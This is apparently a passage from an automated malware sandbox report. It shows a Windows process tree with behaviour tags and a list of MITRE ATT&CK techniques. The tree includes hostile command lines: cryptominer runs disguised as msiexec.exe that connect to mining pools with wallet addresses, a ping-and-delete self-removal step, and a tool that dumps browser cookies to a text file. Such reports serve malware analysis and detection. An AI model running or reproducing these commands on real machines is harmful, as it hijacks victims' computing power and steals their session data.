powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nslDFE3.tmp\tempfile.ps1"
10⤵
PID:5368

C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe
"C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe" C:\Program Files (x86)\lighteningplayer\plugins\ /SILENT
10⤵
- Executes dropped EXE
- Loads dropped DLL
PID:2732

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\qg4jtsng.jiw\GcleanerWW.exe /mixone & exit
8⤵
PID:5588

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\pgo10vmo.wnm\toolspab1.exe & exit
8⤵
PID:2208

C:\Users\Admin\AppData\Local\Temp\pgo10vmo.wnm\toolspab1.exe
C:\Users\Admin\AppData\Local\Temp\pgo10vmo.wnm\toolspab1.exe
9⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:5564

C:\Users\Admin\AppData\Local\Temp\pgo10vmo.wnm\toolspab1.exe
C:\Users\Admin\AppData\Local\Temp\pgo10vmo.wnm\toolspab1.exe
10⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:5448

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\531vjcul.w5g\c7ae36fa.exe & exit
8⤵
PID:5444

C:\Users\Admin\AppData\Local\Temp\531vjcul.w5g\c7ae36fa.exe
C:\Users\Admin\AppData\Local\Temp\531vjcul.w5g\c7ae36fa.exe
9⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks SCSI registry key(s)
- Checks processor information in registry
- Suspicious behavior: MapViewOfSection
PID:5920

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\4p4tmclj.phh\app.exe /8-2222 & exit
8⤵
- Blocklisted process makes network request
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of SetThreadContext
PID:5160

C:\Users\Admin\AppData\Local\Temp\4p4tmclj.phh\app.exe
C:\Users\Admin\AppData\Local\Temp\4p4tmclj.phh\app.exe /8-2222
9⤵
- Executes dropped EXE
PID:5788

C:\Users\Admin\AppData\Local\Temp\4p4tmclj.phh\app.exe
"C:\Users\Admin\AppData\Local\Temp\4p4tmclj.phh\app.exe" /8-2222
10⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
PID:4192

C:\Users\Admin\AppData\Local\Temp\RarSFX2\filee.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX2\filee.exe"
4⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
PID:4580

C:\Users\Admin\AppData\Roaming\B14F.tmp.exe
"C:\Users\Admin\AppData\Roaming\B14F.tmp.exe"
5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:960

C:\Users\Admin\AppData\Roaming\B14F.tmp.exe
"C:\Users\Admin\AppData\Roaming\B14F.tmp.exe"
6⤵
PID:5920

C:\Users\Admin\AppData\Roaming\B558.tmp.exe
"C:\Users\Admin\AppData\Roaming\B558.tmp.exe"
5⤵
PID:5160

C:\Windows\system32\msiexec.exe
-P stratum1+ssl://0xb7633a80145Ec9ce2b8b5F80AB36C783064C2E10.w26753@eu-eth.hiveon.net:24443 -R --response-timeout 30 --farm-retries 99999
6⤵
PID:2836

C:\Windows\system32\msiexec.exe
-o pool.supportxmr.com:8080 -u 47wDrszce6VbnMB4zhhEA1Gr3EzwHx2eS6QzC5sFoq8iGdMjnzX8bnEjBdQHsAuW8C1SNgxyGa4DQTVnQ9jfhRod73np5P8.w9676 --cpu-max-threads-hint 50 -r 9999
6⤵
- Blocklisted process makes network request
PID:5632

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX2\filee.exe"
5⤵
PID:5908

C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1
6⤵
- Runs ping.exe
PID:5404

C:\Users\Admin\AppData\Local\Temp\RarSFX2\jg6_6asg.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX2\jg6_6asg.exe"
4⤵
- Executes dropped EXE
- Checks whether UAC is enabled
PID:6184

C:\Users\Admin\AppData\Local\Temp\RarSFX2\gaoou.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX2\gaoou.exe"
4⤵
- Executes dropped EXE
- Adds Run key to start application
PID:5056

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
5⤵
- Executes dropped EXE
PID:3736

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
5⤵
PID:6948

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
5⤵
- Executes dropped EXE
PID:5132

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
5⤵
- Executes dropped EXE
PID:3176

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
1⤵
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:4260

C:\Windows\system32\browser_broker.exe
C:\Windows\system32\browser_broker.exe -Embedding
1⤵
- Modifies Internet Explorer settings
PID:3836

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
PID:5360

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Modifies Internet Explorer settings
- Modifies registry class
PID:5944

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Modifies registry class
PID:4900

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Modifies registry class
PID:6964

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s seclogon
1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
PID:4288

C:\Users\Admin\AppData\Local\Temp\AECA.exe
C:\Users\Admin\AppData\Local\Temp\AECA.exe
1⤵
- Executes dropped EXE
PID:4572

C:\Users\Admin\AppData\Local\Temp\DB98.exe
C:\Users\Admin\AppData\Local\Temp\DB98.exe
1⤵
PID:428

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
2⤵
PID:6888

C:\Users\Admin\AppData\Local\Temp\E983.exe
C:\Users\Admin\AppData\Local\Temp\E983.exe
1⤵
- Executes dropped EXE
PID:5804

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5804 -s 276
2⤵
- Executes dropped EXE
- Program crash
PID:6948

C:\Users\Admin\AppData\Local\Temp\F089.exe
C:\Users\Admin\AppData\Local\Temp\F089.exe
1⤵
- Executes dropped EXE
PID:6800

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
PID:7096

C:\Windows\explorer.exe
C:\Windows\explorer.exe
1⤵
PID:6348

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
PID:5920

C:\Windows\explorer.exe
C:\Windows\explorer.exe
1⤵
- Suspicious behavior: MapViewOfSection
PID:6168

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
PID:2324

C:\Windows\explorer.exe
C:\Windows\explorer.exe
1⤵
- Suspicious behavior: MapViewOfSection
PID:1840

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
PID:5256

C:\Windows\explorer.exe
C:\Windows\explorer.exe
1⤵
- Suspicious behavior: MapViewOfSection
PID:6268

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
PID:6236

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
1⤵
PID:5552

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s fhsvc
1⤵
PID:6984

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
1⤵
- Drops file in Windows directory
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:6924

C:\Windows\system32\browser_broker.exe
C:\Windows\system32\browser_broker.exe -Embedding
1⤵
- Modifies Internet Explorer settings
PID:5840

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:1016

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:6260

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Modifies registry class
PID:6636

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

BITS Jobs

T1197

Registry Run Keys / Startup Folder

T1060

Privilege Escalation

Defense Evasion

BITS Jobs

T1197

Install Root Certificate

T1130

Modify Registry

Web Service

T1102

Credential Access

Credentials in Files

T1081

Discovery

Peripheral Device Discovery

T1120

Query Registry

Remote System Discovery

T1018

Security Software Discovery

T1063

Software Discovery

T1518

System Information Discovery